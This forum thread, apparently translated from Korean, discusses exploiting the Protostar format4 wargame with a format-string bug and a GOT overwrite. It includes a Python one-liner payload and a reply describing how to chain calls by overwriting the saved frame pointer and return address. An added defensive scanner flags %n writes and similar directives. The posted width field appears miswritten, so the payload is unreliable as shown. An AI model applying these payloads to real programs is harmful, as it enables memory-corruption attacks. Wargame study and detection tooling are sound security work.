System Hacking

   tkakr7458
   format string bug + got overwrite

http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=1864


Hmm.. it's hard to explain because I can't upload a picture ㅠㅠ

https://exploit-exercises.com/protostar/format4/

The address above is the source.

I'm trying to overwrite exit with hello.

hello = 0x080484b4 and
exit@got = 0x8049718.

The format offset is 4. (With "AAAA %x%x%x%x" it shows up in the 4th position.)

(python -c 'print "\x18\x97\x04\x08"+"134513840%x"+"%4$n"')
                   exit@got           hello as an integer - 4

I understand that doing it this way performs the overwrite, but I don't know how to call hello repeatedly. Please help ㅠㅠ

  Hit : 2476     Date : 2017/04/19 08:28



    
해쿨러 The intent of this problem itself is to call hello only once. hello contains _exit, so the program will terminate after going to hello anyway, but in a situation where it is not there, calling it repeatedly requires overwriting the stack.
Overwrite the GOT entry of the exit function with a function that proceeds normally even when it receives the argument 1, for example execve (execve does not terminate the program even if its arguments are wrong),
then find the pointer to the sfp. That is, since the vuln function's sfp points to the main function's sfp, use %n on the vuln function's sfp to overwrite the address and then cover everything from the main function's ret onward with the payload via the fsb, and you can do call chaining with an fsb as well.
2017/04/20
해쿨러 http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20
tkakr7458 Thank you. ㅠㅠ 2017/04/20
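
An added example, not part of the thread and not Hackerschool's code: a defensive scanner for the kind of input discussed above. It parses printf conversion directives in untrusted bytes and flags %n writes, direct argument access such as %4$n, and very wide padding. The function names, the WIDE_PAD threshold and the BENIGN and WIDE samples are assumptions made for this illustration; POSTED is the payload string as posted in the question.

```python
import re

# printf(3) conversion grammar: %[argnum$][flags][width][.precision][length]conversion
SPEC = re.compile(
    rb"%(?:(\d+)\$)?[-+ #0']*(\*|\d+)?(?:\.(?:\*|\d+))?"
    rb"(?:hh|h|ll|l|j|z|t|L|q)?([diouxXeEfFgGaAcspnm%])"
)
WIDE_PAD = 4096  # assumed threshold: wider padding is unusual in legitimate text


def scan_format_input(data: bytes):
    """Return (offset, directive, reasons) for each risky directive in untrusted input."""
    findings = []
    for m in SPEC.finditer(data):
        argnum, width, conv = m.groups()
        if conv == b"%":          # "%%" is a literal percent sign, not a conversion
            continue
        reasons = []
        if conv == b"n":          # %n, %hn, %hhn store the output byte count to memory
            reasons.append("memory write (%n)")
        if argnum is not None:    # "N$" selects an arbitrary argument slot
            reasons.append("direct argument access")
        if width and width != b"*" and int(width) > WIDE_PAD:
            reasons.append("very wide padding")
        if reasons:
            findings.append((m.start(), m.group(0).decode("ascii"), reasons))
    return findings


def has_write_directive(data: bytes) -> bool:
    """True if the input would make printf store to memory when used as the format."""
    return any("memory write (%n)" in r for _, _, r in scan_format_input(data))


# Payload exactly as posted in the question above.
POSTED = b"\x18\x97\x04\x08" + b"134513840%x" + b"%4$n"
# Constructed samples (not from the page).
BENIGN = b"disk usage at 100%% for user alice"
WIDE = b"%200000x%7$hn"

if __name__ == "__main__":
    for sample in (POSTED, BENIGN, WIDE):
        print(sample, scan_format_input(sample))
```

A scanner like this is only a triage aid for logs or captured input; the fix in the program itself is to pass user data as an argument, as in printf("%s", buffer), and never as the format string.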